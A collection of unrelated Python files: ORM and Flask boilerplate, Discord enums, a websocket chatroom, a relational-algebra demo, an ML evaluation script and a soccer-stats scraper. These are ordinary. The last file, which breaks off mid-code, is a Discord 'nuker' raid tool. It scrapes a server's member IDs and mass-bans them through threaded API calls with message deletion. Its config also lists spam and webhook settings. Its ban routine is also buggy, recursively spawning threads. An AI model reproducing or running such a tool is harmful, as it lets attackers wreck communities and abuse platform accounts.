create_db (bool): Whether to create the database if it doesn't exist.
sql_debug (bool): Whether to enable SQL debugging
Returns:
Database object
"""
# Create a database object using Pony for abstraction.
db = orm.Database()
define_entities(db)
# Bind to the database at the given path.
db.bind(provider="sqlite", filename=database_path, create_db=create_db)
# Create database tables if necessary.
try:
orm.set_sql_debug(sql_debug)
db.generate_mapping(create_tables=True)
except orm.dbapiprovider.OperationalError as e:
# There was a problem when checking the database. Drop the tables (with
# all data) and recreate the tables. This is currently our fix for
# schema migration while Pony does not support migration.
log.warning(
"Hit problem while checking database. "
"Recreating tables to attempt recovery."
)
log.debug("Dropping tables")
db.drop_all_tables(with_all_data=True)
log.debug("Creating tables")
db.create_tables()
return db
|
import os
from flask import Flask, request, jsonify, abort
from sqlalchemy import exc
import json
from flask_cors import CORS
from .database.models import db_drop_and_create_all, setup_db, Drink
from .auth.auth import AuthError, requires_auth
app = Flask(__name__)
setup_db(app)
CORS(app)
'''
@TODO uncomment the following line to initialize the datbase
!! NOTE THIS WILL DROP ALL RECORDS AND START YOUR DB FROM SCRATCH
!! NOTE THIS MUST BE UNCOMMENTED ON FIRST RUN
'''
# db_drop_and_create_all()
## ROUTES
'''
@TODO implement endpoint
GET /drinks
it should be a public endpoint
it should contain only the drink.short() data representation
returns status code 200 and json {"success": True, "drinks": drinks} where drinks is the list of drinks
or appropriate status code indicating reason for failure
'''
'''
@TODO implement endpoint
GET /drinks-detail
it should require the 'get:drinks-detail' permission
it should contain the drink.long() data representation
returns status code 200 and json {"success": True, "drinks": drinks} where drinks is the list of drinks
or appropriate status code indicating reason for failure
'''
'''
@TODO implement endpoint
POST /drinks
it should create a new row in the drinks table
it should require the 'post:drinks' permission
it should contain the drink.long() data representation
returns status code 200 and json {"success": True, "drinks": drink} where drink an array containing only the newly created drink
or appropriate status code indicating reason for failure
'''
'''
@TODO implement endpoint
PATCH /drinks/<id>
where <id> is the existing model id
it should respond with a 404 error if <id> is not found
it should update the corresponding row for <id>
it should require the 'patch:drinks' permission
it should contain the drink.long() data representation
returns status code 200 and json {"success": True, "drinks": drink} where drink an array containing only the updated drink
or appropriate status code indicating reason for failure
'''
'''
@TODO implement endpoint
DELETE /drinks/<id>
where <id> is the existing model id
it should respond with a 404 error if <id> is not found
it should delete the corresponding row for <id>
it should require the 'delete:drinks' permission
returns status code 200 and json {"success": True, "delete": id} where id is the id of the deleted record
or appropriate status code indicating reason for failure
'''
## Error Handling
'''
Example error handling for unprocessable entity
'''
@app.errorhandler(422)
def unprocessable(error):
return jsonify({
"success": False,
"error": 422,
"message": "unprocessable"
}), 422
'''
@TODO implement error handlers using the @app.errorhandler(error) decorator
each error handler should return (with approprate messages):
jsonify({
"success": False,
"error": 404,
"message": "resource not found"
}), 404
'''
'''
@TODO implement error handler for 404
error handler should conform to general task above
'''
'''
@TODO implement error handler for AuthError
error handler should conform to general task above
'''
|
"""
MIT License
Copyright (c) 2021-present RPS
Copyright (c) 2015-2021 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from enum import Enum
from typing import (
Optional,
Dict,
Type,
Any,
TypeVar
)
# Credit To Rapptz For The Enums
class ChannelType(Enum):
text = 0
private = 1
voice = 2
group = 3
category = 4
news = 5
store = 6
news_thread = 10
public_thread = 11
private_thread = 12
stage_voice = 13
def __str__(self):
return self.name
class MessageType(Enum):
default = 0
recipient_add = 1
recipient_remove = 2
call = 3
channel_name_change = 4
channel_icon_change = 5
pins_add = 6
new_member = 7
premium_guild_subscription = 8
premium_guild_tier_1 = 9
premium_guild_tier_2 = 10
premium_guild_tier_3 = 11
channel_follow_add = 12
guild_stream = 13
guild_discovery_disqualified = 14
guild_discovery_requalified = 15
guild_discovery_grace_period_initial_warning = 16
guild_discovery_grace_period_final_warning = 17
thread_created = 18
reply = 19
application_command = 20
thread_starter_message = 21
guild_invite_reminder = 22
class VoiceRegion(Enum):
us_west = 'us-west'
us_east = 'us-east'
us_south = 'us-south'
us_central = 'us-central'
eu_west = 'eu-west'
eu_central = 'eu-central'
singapore = 'singapore'
london = 'london'
sydney = 'sydney'
amsterdam = 'amsterdam'
frankfurt = 'frankfurt'
brazil = 'brazil'
hongkong = 'hongkong'
russia = 'russia'
japan = 'japan'
southafrica = 'southafrica'
south_korea = 'south-korea'
india = 'india'
europe = 'europe'
dubai = 'dubai'
vip_us_east = 'vip-us-east'
vip_us_west = 'vip-us-west'
vip_amsterdam = 'vip-amsterdam'
def __str__(self):
return self.value
class SpeakingState(Enum):
none = 0
voice = 1
soundshare = 2
priority = 4
def __str__(self):
return self.name
def __int__(self):
return self.value
class VerificationLevel(Enum, comparable=True):
none = 0
low = 1
medium = 2
high = 3
highest = 4
def __str__(self):
return self.name
class ContentFilter(Enum, comparable=True):
disabled = 0
no_role = 1
all_members = 2
def __str__(self):
return self.name
class Status(Enum):
online = 'online'
offline = 'offline'
idle = 'idle'
dnd = 'dnd'
do_not_disturb = 'dnd'
invisible = 'invisible'
def __str__(self):
return self.value
class DefaultAvatar(Enum):
blurple = 0
grey = 1
gray = 1
green = 2
orange = 3
red = 4
def __str__(self):
return self.name
class NotificationLevel(Enum, comparable=True):
all_messages = 0
only_mentions = 1
class AuditLogActionCategory(Enum):
create = 1
delete = 2
update = 3
class AuditLogAction(Enum):
# fmt: off
guild_update = 1
channel_create = 10
channel_update = 11
channel_delete = 12
overwrite_create = 13
overwrite_update = 14
overwrite_delete = 15
kick = 20
member_prune = 21
ban = 22
unban = 23
member_update = 24
member_role_update = 25
member_move = 26
member_disconnect = 27
bot_add = 28
role_create = 30
role_update = 31
role_delete = 32
invite_create = 40
invite_update = 41
invite_delete = 42
webhook_create = 50
webhook_update = 51
webhook_delete = 52
emoji_create = 60
emoji_update = 61
emoji_delete = 62
message_delete = 72
message_bulk_delete = 73
message_pin = 74
message_unpin = 75
integration_create = 80
integration_update = 81
integration_delete = 82
stage_instance_create = 83
stage_instance_update = 84
stage_instance_delete = 85
sticker_create = 90
sticker_update = 91
sticker_delete = 92
thread_create = 110
thread_update = 111
thread_delete = 112
# fmt: on
@property
def category(self) -> Optional[AuditLogActionCategory]:
# fmt: off
lookup: Dict[AuditLogAction, Optional[AuditLogActionCategory]] = {
AuditLogAction.guild_update: AuditLogActionCategory.update,
AuditLogAction.channel_create: AuditLogActionCategory.create,
AuditLogAction.channel_update: AuditLogActionCategory.update,
AuditLogAction.channel_delete: AuditLogActionCategory.delete,
AuditLogAction.overwrite_create: AuditLogActionCategory.create,
AuditLogAction.overwrite_update: AuditLogActionCategory.update,
AuditLogAction.overwrite_delete: AuditLogActionCategory.delete,
AuditLogAction.kick: None,
AuditLogAction.member_prune: None,
AuditLogAction.ban: None,
AuditLogAction.unban: None,
AuditLogAction.member_update: AuditLogActionCategory.update,
AuditLogAction.member_role_update: AuditLogActionCategory.update,
AuditLogAction.member_move: None,
AuditLogAction.member_disconnect: None,
AuditLogAction.bot_add: None,
AuditLogAction.role_create: AuditLogActionCategory.create,
AuditLogAction.role_update: AuditLogActionCategory.update,
AuditLogAction.role_delete: AuditLogActionCategory.delete,
AuditLogAction.invite_create: AuditLogActionCategory.create,
AuditLogAction.invite_update: AuditLogActionCategory.update,
AuditLogAction.invite_delete: AuditLogActionCategory.delete,
AuditLogAction.webhook_create: AuditLogActionCategory.create,
AuditLogAction.webhook_update: AuditLogActionCategory.update,
AuditLogAction.webhook_delete: AuditLogActionCategory.delete,
AuditLogAction.emoji_create: AuditLogActionCategory.create,
AuditLogAction.emoji_update: AuditLogActionCategory.update,
AuditLogAction.emoji_delete: AuditLogActionCategory.delete,
AuditLogAction.message_delete: AuditLogActionCategory.delete,
AuditLogAction.message_bulk_delete: AuditLogActionCategory.delete,
AuditLogAction.message_pin: None,
AuditLogAction.message_unpin: None,
AuditLogAction.integration_create: AuditLogActionCategory.create,
AuditLogAction.integration_update: AuditLogActionCategory.update,
AuditLogAction.integration_delete: AuditLogActionCategory.delete,
AuditLogAction.stage_instance_create: AuditLogActionCategory.create,
AuditLogAction.stage_instance_update: AuditLogActionCategory.update,
AuditLogAction.stage_instance_delete: AuditLogActionCategory.delete,
AuditLogAction.sticker_create: AuditLogActionCategory.create,
AuditLogAction.sticker_update: AuditLogActionCategory.update,
AuditLogAction.sticker_delete: AuditLogActionCategory.delete,
AuditLogAction.thread_create: AuditLogActionCategory.create,
AuditLogAction.thread_update: AuditLogActionCategory.update,
AuditLogAction.thread_delete: AuditLogActionCategory.delete,
}
# fmt: on
return lookup[self]
@property
def target_type(self) -> Optional[str]:
v = self.value
if v == -1:
return 'all'
elif v < 10:
return 'guild'
elif v < 20:
return 'channel'
elif v < 30:
return 'user'
elif v < 40:
return 'role'
elif v < 50:
return 'invite'
elif v < 60:
return 'webhook'
elif v < 70:
return 'emoji'
elif v == 73:
return 'channel'
elif v < 80:
return 'message'
elif v < 83:
return 'integration'
elif v < 90:
return 'stage_instance'
elif v < 93:
return 'sticker'
elif v < 113:
return 'thread'
class UserFlags(Enum):
staff = 1
partner = 2
hypesquad = 4
bug_hunter = 8
mfa_sms = 16
premium_promo_dismissed = 32
hypesquad_bravery = 64
hypesquad_brilliance = 128
hypesquad_balance = 256
early_supporter = 512
team_user = 1024
system = 4096
has_unread_urgent_messages = 8192
bug_hunter_level_2 = 16384
verified_bot = 65536
verified_bot_developer = 131072
discord_certified_moderator = 262144
class ActivityType(Enum):
unknown = -1
playing = 0
streaming = 1
listening = 2
watching = 3
custom = 4
competing = 5
def __int__(self):
return self.value
class TeamMembershipState(Enum):
invited = 1
accepted = 2
class WebhookType(Enum):
incoming = 1
channel_follower = 2
application = 3
class ExpireBehaviour(Enum):
remove_role = 0
kick = 1
ExpireBehavior = ExpireBehaviour
class StickerType(Enum):
standard = 1
guild = 2
class StickerFormatType(Enum):
png = 1
apng = 2
lottie = 3
@property
def file_extension(self) -> str:
# fmt: off
lookup: Dict[StickerFormatType, str] = {
StickerFormatType.png: 'png',
StickerFormatType.apng: 'png',
StickerFormatType.lottie: 'json',
}
# fmt: on
return lookup[self]
class InviteTarget(Enum):
unknown = 0
stream = 1
embedded_application = 2
class InteractionType(Enum):
ping = 1
application_command = 2
component = 3
class InteractionResponseType(Enum):
pong = 1
# ack = 2 (deprecated)
# channel_message = 3 (deprecated)
channel_message = 4 # (with source)
deferred_channel_message = 5 # (with source)
deferred_message_update = 6 # for components
message_update = 7 # for components
class VideoQualityMode(Enum):
auto = 1
full = 2
def __int__(self):
return self.value
class ComponentType(Enum):
action_row = 1
button = 2
select = 3
def __int__(self):
return self.value
class ButtonStyle(Enum):
primary = 1
secondary = 2
success = 3
danger = 4
link = 5
# Aliases
blurple = 1
grey = 2
gray = 2
green = 3
red = 4
url = 5
def __int__(self):
return self.value
class StagePrivacyLevel(Enum):
public = 1
closed = 2
guild_only = 2
class NSFWLevel(Enum, comparable=True):
default = 0
explicit = 1
safe = 2
age_restricted = 3
T = TypeVar('T')
def create_unknown_value(cls: Type[T], val: Any) -> T:
value_cls = cls._enum_value_cls_ # type: ignore
name = f'unknown_{val}'
return value_cls(name=name, value=val)
def try_enum(cls: Type[T], val: Any) -> T:
"""A function that tries to turn the value into enum ``cls``.
If it fails it returns a proxy invalid value instead.
"""
try:
return cls._enum_value_map_[val] # type: ignore
except (KeyError, TypeError, AttributeError):
return create_unknown_value(cls, val) |
"""
Chatroom defines handlers for client behavior such as connecting and sending messages
"""
import random
import logging
from string import Template
from collections.abc import Iterable
from utils import log, log_message
from user import User
from command_handler import CommandHandler
from config_manager import ConfigManager
from response import Response, Origin
logger = logging.getLogger(__name__)
class Chatroom:
"""
Chatroom manager for websocket based connections
"""
def __init__(self, chat_config_path):
"""
Create a new Chatroom
Args:
chat_config_path (str): path to chat config yaml
"""
# Dict[Websocket, User]
self.connected = dict()
self.command_handler = CommandHandler()
self.config = ConfigManager(chat_config_path)
self.name_generator = AdjAnimalNameGenerator(
self.config["name_generator"]["adjective_path"],
self.config["name_generator"]["animal_path"])
self.env = self.config["meta"]["enviornment"]
@log(logger, logging.INFO)
async def handle_connection(self, websocket, name=None):
"""
Registers a new websocket connection and notifies users
Args:
websocket (Websocket): new connection websocket
"""
name = name if name is not None else self.generate_name()
user = User(websocket, name)
self.connected[websocket] = user
await self.send(Response(self.get_greeting(name), Origin.SERVER), websocket)
await self.send_to_all(Response(self.get_connection_notification(name), Origin.SERVER), websocket)
@log(logger, logging.INFO)
async def handle_message(self, websocket, message):
"""
Handles incoming message:
If it is a message, send to all users.
If it is a command, process it
Args:
websocket (Websocket): websocket that sent message
message (str): message sent
"""
user = self.connected[websocket]
if self.command_handler.is_command(message):
await self.command_handler.handle_command(message, user, self)
return
body = f"{user.name}: {message}"
all_response = Response(body, Origin.USER)
sender_response = Response(body, Origin.SELF)
await self.send_to_all(all_response, websocket)
await self.send(sender_response, websocket)
@log(logger, logging.INFO)
async def handle_disconnect(self, websocket):
"""
handles disconnect of websocket and notifies all connections
Args:
websocket (Websocket): Connection that was closed
"""
user = self.connected.pop(websocket)
await self.send_to_all(Response(self.get_disconnect_notification(user.name), Origin.SERVER))
@log(logger, logging.INFO)
async def send(self, response, websocket):
"""Send a response to a websocket
Args:
response (Response): The Response to send
websocket (Websocket): The websocket to send the Response to
"""
if not isinstance(response, Response):
log_message(f"Outgoing: {response} is not of type Response, preventing send", logging.CRITICAL)
return
if response.data["origin"] == Origin.DEFAULT:
log_message(f"Outgoing response has DEFAULT origin", logging.WARNING)
await websocket.send(response.json())
@log(logger, logging.INFO)
async def send_to_all(self, response, skip={}):
"""
Send a message to all connected clients, except those in skip
Args:
response (Response): Response to send to all connections
skip (set, optional): Union[Websocket, Iterable[Websocket]] to skip. Defaults to {}.
"""
if not isinstance(skip, Iterable):
skip = {skip}
for websocket in self.connected:
if websocket not in skip:
await self.send(response, websocket)
@log(logger, logging.CRITICAL)
async def handle_shutdown(self):
"""
Notifies all clients of shutdown and closes their connections
"""
await self.send_to_all(Response(self.get_shutdown_notification(), Origin.SERVER))
for conn in self.connected.keys():
await conn.close()
@log(logger, logging.INFO)
async def change_name(self, websocket, new_name):
"""
Changes name of user connected with websocket to new_name
Args:
websocket (Websocket): connection to change name of
new_name (str): new name for user
"""
old_name = self.connected[websocket].name
# sanitize by removing all whitespace
new_name = "".join(new_name.split())
self.connected[websocket].name = new_name
await self.send_to_all(Response(self.get_name_change_notification(old_name, new_name), Origin.SERVER))
@log(logger, logging.INFO)
async def private_message(self, message, from_websocket, to_websocket):
outgoing = Response(self.get_outgoing_pm(message, self.connected[from_websocket].name), Origin.PRIVATE)
receipt = Response(self.get_pm_receipt(message, self.connected[to_websocket].name), Origin.PRIVATE)
await self.send(outgoing, to_websocket)
await self.send(receipt, from_websocket)
def generate_name(self):
"""
Generate an initial name for a new client
Returns:
str: Randomly generated name
"""
return self.name_generator.generate_name()
def get_greeting(self, name):
"""
Generates greeting str for new connection
Args:
name (str): client name of new connection
Returns:
str: greeting for new connection
"""
return Template(self.config["greeting_temp"]).substitute(name=name)
def get_connection_notification(self, name):
"""
Generates notification str for a new connection
Args:
name (str): name of new connection client
Returns:
str: notification for clients
"""
return Template(self.config["conn_notif_temp"]).substitute(name=name)
def get_disconnect_notification(self, name):
"""
Generates disconnect notification str for disconnected client
Args:
name (str): name of disconnected client
Returns:
str: notification for clients
"""
return Template(self.config["disconn_notif_temp"]).substitute(name=name)
def get_name_change_notification(self, old_name, new_name):
"""
Generates name change notification
Args:
old_name (str): old name, before change
new_name (str): new name, after change
Returns:
str: notification for clients
"""
return Template(self.config["namechange_notif_temp"]).substitute(old=old_name, new=new_name)
def get_shutdown_notification(self):
"""
Generates server shutdown notification
Returns:
str: notification for clients
"""
return self.config["shutdown_notif_temp"]
def get_outgoing_pm(self, message, from_name):
return Template(self.config["private_messate_from_temp"]).substitute(from_name=from_name, message=message)
def get_pm_receipt(self, message, to_name):
return Template(self.config["private_message_to_temp"]).substitute(to_name=to_name, message=message)
def __repr__(self):
return f"<Chatroom, connections: {len(self.connected)}>"
class AdjAnimalNameGenerator:
def __init__(self, adj_path, animal_path):
with open(adj_path) as adjs:
self.adjectives = [word.strip().capitalize()
for word in adjs.readlines()]
with open(animal_path) as animals:
self.animals = [word.strip().capitalize()
for word in animals.readlines()]
def generate_name(self):
return f"{random.choice(self.adjectives)}{random.choice(self.animals)}"
|
import pykorm
class Score(pykorm.models.Nested):
exterior: int = pykorm.fields.DataField('exterior')
delicious: int = pykorm.fields.DataField('delicious', 10)
class ScoreMixin(object):
score: Score = pykorm.fields.DictNestedField(Score, path=['spec', 'score'])
@pykorm.k8s_custom_object('pykorm.infomaniak.com', 'v1', 'apples')
class Apple(ScoreMixin, pykorm.ClusterModel):
variety: str = pykorm.fields.Spec('variety', 'default-variety')
if __name__ == '__main__':
ap = Apple(name='abc', score=Score(exterior=10))
pk = pykorm.Pykorm()
pk.save(ap)
print(ap)
|
from SPJRUD import SPJRUD
from SPJRUD.Select import Select
from SPJRUD.Project import Project
from SPJRUD.Join import Join
from SPJRUD.Rename import Rename
from SPJRUD.Union import Union
from SPJRUD.Difference import Difference
from Ope.Equal import Equal
from Representation.Constante import Constante
from Representation.Attribute import Attribute
from Representation.Relation import Relation
from sql import *
#Sur une base de donnée
creat_Database("database")
print_TableFromADatabase("database.db", "emp")
x = creat_RelationFromDatabase("database.db", "emp2")
y = creat_RelationFromDatabase("database.db", "emp")
z = creat_RelationFromDatabase("database.db", "dept")
a = Select(Equal("ename", "job"), y)
print(a)
print(a.get_SQL())
print("--------------------------------------------------------------")
b = Project(["ename", "sal", "deptno"], y)
print(b)
print(b.get_SQL())
print("--------------------------------------------------------------")
bb = Project(["dname", "deptno", "loc"], z)
print(bb)
print(bb.get_SQL())
print("--------------------------------------------------------------")
c = Join(b, bb)
print(c)
print(c.get_SQL())
print("--------------------------------------------------------------")
d = Rename("ename", "Nom", y)
print(d)
print(d.get_SQL())
print("--------------------------------------------------------------")
e = Union(x, y)
print(e)
print(e.get_SQL())
print("--------------------------------------------------------------")
f = Difference(x, y)
print(f)
print(f.get_SQL())
print("--------------------------------------------------------------")
g = Join(Project(["name", "sal", "job", "deptno"], Select(Equal("name", Constante("JAMES")), Rename("ename", "name", y))), z)
print(g)
print(g.get_SQL())
print("--------------------------------------------------------------")
h = Select(Equal("name", Constante("JAMES")), Rename("ename", "name", y))
print(h)
print(h.get_SQL())
print("--------------------------------------------------------------")
i = Project(["name", "sal", "job", "deptno"], Select(Equal("sal", Constante(5000.0)), Rename("ename", "name", y)))
print(i)
print(i.get_SQL())
print("--------------------------------------------------------------")
executeSQL_OnDatabase("database.db", i.get_SQL())
print("--------------------------------------------------------------")
#Sur une relation créée moi-même
rel = Relation(
"Personne",
[
Attribute("id", 'INTEGER'),
Attribute("nom", 'TEXT'),
Attribute("prenom", 'TEXT')
])
rel2 = Relation(
"Infos_Personne",
[
Attribute("id", 'INTEGER'),
Attribute("sexe", 'TEXT'),
Attribute("age", 'INTEGER'),
Attribute("taille", 'REAL'),
Attribute("poids", 'REAL')
])
a = Select(Equal("nom", "prenom"), rel)
print(a)
print(a.get_SQL())
print("--------------------------------------------------------------")
b = Project(["id", "nom", "prenom"], rel)
print(b)
print(b.get_SQL())
print("--------------------------------------------------------------")
bb = Project(["id", "sexe", "age"], rel2)
print(bb)
print(bb.get_SQL())
print("--------------------------------------------------------------")
c = Join(b, bb)
print(c)
print(c.get_SQL())
print("--------------------------------------------------------------")
d = Rename("nom", "Name", rel)
print(d)
print(d.get_SQL())
print("--------------------------------------------------------------")
g = Join(Project(["id", "nom", "prenom"], Select(Equal("nom", Constante("DELPLANQUE")), rel)), rel2)
print(g)
print(g.get_SQL())
print("--------------------------------------------------------------")
h = Select(Equal("NomDeFamille", Constante("DELPLANQUE")), Rename("nom", "NomDeFamille", rel))
print(h)
print(h.get_SQL())
print("--------------------------------------------------------------") |
import os
import time
import operator
import argparse
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split, StratifiedKFold
from sklearn import metrics
from utils import timer, load_and_preprocess, load_trained_model
def fit_and_eval(X_train, y_train, X_val, y_val, module, pretrained=False):
"""
train model and eval hold-out performance
BTW, write scores to csv files
Parameters
----------
X_train, y_train, X_val, y_val: features and targets
module: a python module
pretrained: bool, if true, load the model pickle
Return
------
best_thres: float
df_score: dataframe with thres and f1 score
"""
# get model
model = module.get_model()
# load model
if pretrained:
print('loading model ......')
network = model.model
model.model = load_trained_model(network, module.MODEL_FILEPATH)
else: # or, train model
print('fitting model ......')
model = model.fit(X_train, y_train)
# predict probas
print('predicting probas ......')
y_proba = model.predict_proba(X_val)
# score
scores = {}
for thres in np.arange(0, 0.51, 0.01):
thres = round(thres, 2)
scores[thres] = metrics.f1_score(y_val, (y_proba > thres).astype(int))
print("val F1 score: {:.4f} with threshold at {}".format(scores[thres], thres)) # noqa
# get max
best_thres, best_score = max(scores.items(), key=operator.itemgetter(1))
print("best F1 score: {:.4f} with threshold at {}".format(best_score, best_thres)) # noqa
# write to disk
df_score = pd.DataFrame(scores, index=['f1']).transpose()
return best_thres, df_score
def parse_args():
parser = argparse.ArgumentParser(
prog="Quora Insincere Questions Classification",
description="Run Model Evaluation and Pick the Best Threshold")
parser.add_argument('--datapath', nargs='?', default=os.environ['DATA_PATH'], # noqa
help='input data path')
parser.add_argument('--model', nargs='?', default='model_v30',
help='model version')
parser.add_argument('--pretrained', type=bool, default=False,
help='use pre-trained model')
parser.add_argument('--cv', type=int, default=2,
help='n folds for CV')
return parser.parse_args()
if __name__ == '__main__':
# config
RANDOM_STATE = 99
SHUFFLE = True
TEST_SIZE = 0.50
# get args
args = parse_args()
datapath = args.datapath
model = args.model
pretrained = args.pretrained
cv = args.cv
t0 = time.time()
# 1. import module
module = __import__(model)
# 2. load and preprocess data
with timer("Load and Preprocess"):
df_train, _, X_train, _ = load_and_preprocess(datapath, module)
# 3. fit and eval
with timer('Fitting and Validating'):
if cv == 2:
X_t, X_v, y_t, y_v = train_test_split(
X_train, df_train.target,
test_size=TEST_SIZE, random_state=RANDOM_STATE,
shuffle=SHUFFLE, stratify=df_train.target)
best_thres, df_score = fit_and_eval(X_t, y_t, X_v, y_v, module, pretrained) # noqa
filepath = os.path.join(datapath, 'eval_{}.csv'.format(model))
df_score.to_csv(filepath)
print('Save CV score file to {}'.format(filepath))
else:
cv_strat = StratifiedKFold(
n_splits=cv, shuffle=SHUFFLE, random_state=RANDOM_STATE)
avg_thres = 0
score_dfs = []
for idx_train, idx_val in cv_strat.split(X_train, df_train.target):
X_t = X_train[idx_train]
y_t = df_train.target[idx_train]
X_v = X_train[idx_val]
y_v = df_train.target[idx_val]
best_thres, df_score = fit_and_eval(X_t, y_t, X_v, y_v, module)
avg_thres += best_thres
score_dfs.append(df_score)
best_thres = round(np.mean(avg_thres), 2)
filepath = os.path.join(datapath, 'trainer_{}.csv'.format(model))
pd.concat(score_dfs, axis=1).to_csv(filepath)
print('Save CV score file to {}'.format(filepath))
print('Entire program is done and it took {:.2f}s'.format(time.time() - t0)) # noqa
|
import requests
import re
import time
from datetime import datetime
import json
from tqdm import tqdm
import numpy as np
import seaborn as sns
from matplotlib import patches
import pandas as pd
import parser
import sys
import random
from collections import Counter
from bs4 import BeautifulSoup
from sklearn import preprocessing
import urllib
def convert_int(string):
try:
string = int(string)
return string
except:
return string
def get_team(request, link=None):
team = {}
if not link:
team_searched = request
team_searched = urllib.parse.quote(team_searched.encode('utf-8'))
search_link = "http://us.soccerway.com/search/teams/?q={}".format(team_searched)
response = requests.get(search_link)
bs = BeautifulSoup(response.text, 'lxml')
results = bs.find("ul", class_='search-results')
# Take the first results
try:
link = "http://us.soccerway.com" + results.find_all('a')[0]['href']
print('Please check team link:', link)
team['id_'] = results.find_all('a')[0]["href"].split('/')[4]
team['name'] = results.find_all('a')[0].text
team['country'] = results.find_all('a')[0]["href"].split('/')[2]
except:
print('No team found !')
else:
team['id_'] = link.split('/')[6]
team['name'] = link.split('/')[5]
team['country'] = link.split('/')[4]
return team
def get_games(team, nb_pages=12):
games = []
for page_number in range(nb_pages):
link_base = 'http://us.soccerway.com/a/block_team_matches?block_id=page_team_1_block_team_matches_3&callback_params='
link_ = urllib.parse.quote('{"page":0,"bookmaker_urls":[],"block_service_id":"team_matches_block_teammatches","team_id":%s,\
"competition_id":0,"filter":"all","new_design":false}' % team['id_']) + '&action=changePage¶ms=' + urllib.parse.quote('{"page":-%s}' % (page_number))
link = link_base + link_
response = requests.get(link)
test = json.loads(response.text)['commands'][0]['parameters']['content']
bs = BeautifulSoup(test, 'lxml')
for kind in ['even', 'odd']:
for elem in bs.find_all('tr', class_ = kind):
game = {}
game["date"] = elem.find('td', {'class': ["full-date"]}).text
game["competition"] = elem.find('td', {'class': ["competition"]}).text
game["team_a"] = elem.find('td', class_='team-a').text
game["team_b"] = elem.find('td', class_='team-b').text
game['link'] = "http://us.soccerway.com" + elem.find('td', class_='score-time').find('a')['href']
game["score"] = elem.find('td', class_='score-time').text.replace(' ','')
if 'E' in game["score"]:
game["score"] = game['score'].replace('E','')
game['extra_time'] = True
if 'P' in game["score"]:
game["score"] = game['score'].replace('P','')
game['penalties'] = True
if datetime.strptime(game["date"], '%d/%m/%y') < datetime.now():
game = parser.get_score_details(game, team)
time.sleep(random.uniform(0, 0.25))
game.update(parser.get_goals(game['link']))
else:
del game['score']
games.append(game)
games = sorted(games, key=lambda x:datetime.strptime(x['date'], '%d/%m/%y'))
team['games'] = games
return team
def get_squad(team, season_path='./seasons_codes.json'):
with open(season_path, 'r') as f:
seasons = json.load(f)[team["country"]]
team['squad'] = {}
for k,v in seasons.items():
link_base = 'http://us.soccerway.com/a/block_team_squad?block_id=page_team_1_block_team_squad_3&callback_params='
link_ = urllib.parse.quote('{"team_id":%s}' % team['id_']) + '&action=changeSquadSeason¶ms=' + urllib.parse.quote('{"season_id":%s}' % v)
link = link_base + link_
response = requests.get(link)
test = json.loads(response.text)['commands'][0]['parameters']['content']
bs = BeautifulSoup(test, 'lxml')
players = bs.find('tbody').find_all('tr')
squad = [{
k: convert_int(player.find('td', class_=k).text)
for k in [k for k,v in Counter(np.concatenate([elem.attrs['class'] for elem in player.find_all('td')])).items()
if v < 2 and k not in ['photo', '', 'flag']]
} for player in players]
team['squad'][k] = squad
try:
coach = {'position': 'Coach', 'name':bs.find_all('tbody')[1].text}
team['coach'][k] = coach
except: pass
return team
if __name__ == '__main__':
if len(sys.argv) > 1:
request = ' '.join(sys.argv[1:])
else:
raise ValueError('You must enter a requested team!')
team = get_team(request)
f = input('Satisfied ? (Y/n) ')
count = 0
while f not in ['Y', 'y','yes','']:
if count < 3:
request = input('Enter a new request : ')
link = None
else:
link = input('Paste team link : ')
team = get_team(request, link)
f = input('Satisfied ? (Y/n)')
count += 1
team = get_games(team)
team = get_squad(team)
with open('./teams/%s.json' % team["name"].lower(), 'w') as f:
json.dump(team, f)
|
import platform, os, json, discord
from time import sleep
from random import randint, choice
from threading import Thread
from colored import fg
from discord.ext import commands
from colorama import Fore
from discord.ext.commands import bot
from requests_futures.sessions import FuturesSession
s = Fore.RESET
f = Fore.LIGHTBLACK_EX
m = fg("#19ffc2")
g = fg("#00FF00")
b = fg("#FF0000")
intents = discord.Intents.all()
intents.members = True
with open('config.json') as lol:
config = json.load(lol)
Token = config.get('token')
minwork = config.get('Min-Workers')
maxwork = config.get('Max-Workers')
cname = config.get("channel-names")
reason = config.get('reason')
webname = config.get('webhook-name')
spam = config.get('spam-msg')
session = FuturesSession(max_workers=randint(minwork,maxwork),)
client = commands.Bot(command_prefix="ffff", case_insensitive=False, intents=intents)
client.remove_command("help")
os.system("cls & mode 70,25 & title six nuker")
headers = {"Authorization": f"Bot {Token}"}
def clear():
if platform.system().lower() == "windows":
os.system("cls")
else:
os.system("clear")
@client.event
async def on_ready():
await menu()
async def scrape():
cum = 0
guild = input(f"{s}[{m}STATUS{s}] {m}Serverid{s}:{m} ")
await client.wait_until_ready()
guil = client.get_guild(int(guild))
members = await guil.chunk()
with open('scraped.txt', "w+") as p:
for member in members:
cum += 1
p.write(str(member.id) + "\n")
print(f"{s}[{m}STATUS{s}] [ {m}{cum}{s} ] {m}users scraped in {s}[ {m}{guild} {s}]")
p.close()
sleep(2)
def ban(guild, member):
try:
r = session.put(f"https://canary.discord.com/api/v{randint(7,9)}/guilds/{guild}/bans/{member}", headers=headers, json={"delete_message_days": 7, "reason": choice(reason)}, stream=True).result()
if r.status_code == 429:
print(f"{s}[{m}STATUS{s}] {m}Rate Limited {s}[ {m}{member} {s}] | {m}{r.json['retery_after']}{s}ms")
members = open('scraped.txt').readlines()
ts = []
for _ in range(100, 999):
for member in members:
t = Thread(target=ban, args=(guild, member,))
t.start()
ts.append(t)
for t in ts:
t.join()
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f'{m}Banned{s}: {m}{member}{s}')
except:
pass
